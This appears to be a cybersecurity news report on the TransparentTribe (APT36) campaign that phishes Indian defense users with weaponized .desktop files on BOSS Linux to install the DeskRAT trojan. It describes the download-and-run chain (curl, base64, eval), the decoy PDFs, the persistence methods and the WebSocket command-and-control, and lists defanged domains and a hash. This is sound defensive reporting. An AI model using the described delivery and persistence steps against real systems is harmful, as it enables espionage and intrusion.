Pakistan-linked threat group TransparentTribe has launched a phishing campaign since June 2025 to deploy the Golang-based DeskRAT malware on Linux systems in Indian defense networks. The attacks exploit BOSS Linux through malicious ZIP files disguised as official documents. Cybersecurity firms CYFIRMA and Sekoia.io have analyzed the operation, highlighting its ties to regional unrest.
The campaign, attributed to TransparentTribe (also known as APT36 or Operation C-Major), began in June 2025 and was uncovered by CYFIRMA in July 2025. This Pakistan-nexus group, active since at least 2013, focuses on cyber espionage supporting strategic interests against India.
Phishing emails deliver ZIP archives, such as 'Cyber-Security-Advisory.zip' or 'MoM_regarding_Defence_Sectors_by_Secy_Defence_25_Sep_2025.zip', containing weaponized .desktop files tailored for BOSS Linux, India's government-endorsed operating system. Upon execution, these files trigger Bash one-liners that use built-in tools like curl, base64, and eval to download encoded payloads from domains including modgovindia[.]com. The payload decodes into the /tmp/ directory, gains executable permissions, and runs silently in the background while opening a decoy PDF—such as 'CDS_Directive_Armed_Forces.pdf'—in Firefox to distract users.
Earlier iterations relied on Google Drive links, but recent attacks shift to dedicated staging servers for better stealth. The commands are hidden amid commented PNG data, though reliance on xxd (not default on BOSS Linux) may cause execution failures.
The endpoint is DeskRAT, a modular Golang remote access trojan with descriptive function names suggesting large language model assistance. Its sample (MD5: 3563518ef8389c7c7ac2a80984a2c4cd) includes unused evasion routines. DeskRAT achieves persistence via systemd services, crontab, autostart files, and bash scripts. It connects via unsecured WebSocket to C2 servers like seeconnectionalive[.]website and newforsomething[.]rest on port 8080, sending initial JSON with fake metadata like hardcoded Office versions.
Operators access a web-based dashboard for file browsing, data exfiltration, remote commands, and payload uploads. The timing exploits unrest, including Ladakh protests in September 2025 and New Delhi marches in August 2025, in the geopolitically sensitive Ladakh region bordering Pakistan and China.
Analysts note TransparentTribe's shift to Linux targets as a sophistication increase, urging email filtering, system hardening, and monitoring for Indian defense networks.